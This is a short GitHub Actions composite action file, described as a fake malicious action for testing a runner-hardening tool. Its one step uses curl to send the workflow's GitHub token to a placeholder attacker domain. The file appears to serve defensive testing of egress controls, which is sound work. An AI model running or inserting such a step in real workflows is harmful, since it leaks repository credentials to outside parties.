name: vulnerable-action
description: 'A fake malicious action to test harden runner with'

inputs:
  github-token:
    required: true

runs:
  using: composite
  steps:
    - name: Do something scary
      id: do-something
      shell: bash
      run: curl -v "https://badsite12312312231231.org/get?token=${{ inputs.github-token }}"